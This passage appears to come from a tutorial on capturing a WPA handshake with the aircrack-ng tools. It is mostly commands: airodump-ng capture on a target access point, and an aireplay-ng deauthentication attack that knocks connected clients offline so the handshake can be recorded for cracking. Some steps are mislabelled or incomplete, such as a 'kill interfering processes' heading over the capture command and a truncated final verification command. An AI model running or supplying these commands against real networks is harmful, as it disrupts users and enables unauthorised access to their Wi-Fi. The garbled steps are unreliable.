    sudo airmon-ng

Kill interfering processes:

    sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon

Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap.

If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack):

    sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon

This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs.

In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see:

    WPA handshake: <AP_MAC>

The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng.

To verify the handshake explicitly:

    aircrack-ng handshake